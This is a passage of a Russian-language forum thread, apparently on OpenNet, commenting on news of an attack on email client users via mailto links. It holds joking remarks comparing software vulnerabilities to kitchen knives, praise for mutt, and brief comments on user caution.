У кухоных ножей есть опасная уязвимость - если злоумышленник ударит им человека, то человек получит серьёзную травму и даже может умереть. Почему производители ножей не устраняют эту уязвимость? Существующие сейчас правила безопасности - это лишь набор костылей, которые не дают должной защиты. Ведь любой может идти по улице и не заметить подкравшегося сзади злоумышленника.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 93. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от Firecat (ok), 20-Авг-20, 18:23 | ||
Вообще-то кухонный нож плох для таких целей, у него очень слабая проникающая способность по сравнению с боевыми и охотничьими ножами... Короче, уязвимость устранена до максимума возможного.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 91. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +/– | |
| Сообщение от microsoft (?), 20-Авг-20, 13:04 | ||
Ура mutt выстоял, жаль сцраные html письма не переваривает  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 92. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | –2 +/– | |
| Сообщение от Firecat (ok), 20-Авг-20, 18:13 | ||
Короче, безопасные клиенты;  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 98. "Атака на пользователей почтовых клиентов при помощи ссылок m..." | +1 +/– | |
| Сообщение от economist (?), 20-Авг-20, 23:39 | ||
Щелкая по email - юзер хочет слать письмо, и должен быть уже настороже.  | ||
| Ответить | Правка | Наверх | Cообщить модератору | ||
| 
    Архив | Удалить  | 
    Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема  | 
| 
Закладки на сайте Проследить за страницей  | 
Created 1996-2025 by Maxim Chirkov Добавить, Поддержать, Вебмастеру  |